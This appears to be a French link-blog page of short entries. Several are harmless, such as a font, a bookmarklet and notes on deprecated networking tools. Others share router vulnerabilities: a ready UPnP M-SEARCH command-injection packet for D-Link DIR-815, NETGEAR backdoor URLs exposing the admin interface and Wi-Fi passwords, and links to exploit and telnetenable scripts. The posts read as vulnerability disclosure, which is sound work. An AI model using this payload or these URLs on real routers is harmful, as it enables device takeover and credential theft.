Ça fait une petite base mine de rien.

Voici le routeur DLink DIR-815 qui se fait rooter, un packet :

M-SEARCH * HTTP/1.1
HOST:239.255.255.250:1900
ST:uuid:ICI LA COMMANDE
MX:2
MAN:"ssdp:discover"

à envoyer en multicast sur 239.255.255.250, pour le port UDP 1900.

Il y a un script python qui permet de lancer la commande désirée : https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection

Une police gratuite.

Que c'est mouvementé en ce mois d'octobre !
Voici une nouvelle porte dérobée découverte dans les routeurs NETGEAR WNDR3700v4, WNDR3800 et WNDR4700.

C'est assez tendu puisqu'en visitant la page suivante, même en redémarrant le routeur, ça reste open bar :
http://<router address>/BRS_02_genieHelp.html

Et pour avoir les mots de passe Wi-Fi en clair... :
http://<router address>/BRS_success.html

Bref, ça pue, ça pue, ça pue !
Mais que font les développeurs, bordel de bordel de merde ?!

Édit : plus d'infos, histoire de passer des commandes shell : http://shadow-file.blogspot.fr/2013/10/netgear-root-compromise-via-command.html
(copie du script) http://www.tiger-222.fr/paste/?3ec20a62650c94a5#m8h84Z277Ajt/NqYpt1ZeEbGiHwOvzvSGv78v39pjCw=

Édit 2 : apparemment, pas mal de NetGear ont un mot de passe root codé en dur :
https://netgear-telnetenable.googlecode.com/svn/trunk/telnetenable.py
(copie) http://www.tiger-222.fr/paste/?7b254ecdd7f4887c#O9XModbrfDcCki7HgEX9gpZFy8WuM6YRA8/iPw7SWB0=

Un bookmarklet pour ouvrir tous les sites désirés dans des onglets => féniasse niveau 99.

Je kiffe !

Rooter un téléphone Android sans utiliser d’ordinateur.

via Korben

Quelques explications pour faire de meilleures affiches.

via @orangedriveFR

Un modèle clair et simple pour gérer ses projets.
Comme c'est un peu brouillon chez moi, je vais tenter de m'y conformer.

Ah ah excellent !

Ça date de 2011, je ne pensais pas que des commandes telles que ifconfig ou netstat puissent devenir obsolètes. Va falloir y jeter un œil attentivement.
Voici le message des développeurs, datant de 2009 : http://lists.debian.org/debian-devel/2009/03/msg00780.html

Je pense mettre à jour Pombo.

via https://www.mypersonnaldata.eu/shaarli/?OeIV2w

Tien, je n'avais pas vu passer ce "badbios", mais s'il s'avère réel, c'en est fini pour nous !
C'est un virus (si on peut appelé ça comme ça) qui infecte le firmware des clefs USB, aucun fichier n'est modifié sur la clef. Comme d'hab, toutes les clefs USB seront à leur tour infectées. Et donc ce virus reflashe le BIOS, même une réinstallation officielle du BIOs n'y changera rien. Le pire dans tout ça, c'est comment il communique...

Un article qui parle de CoffeeScript (JavaScript) et de canvas HTML5.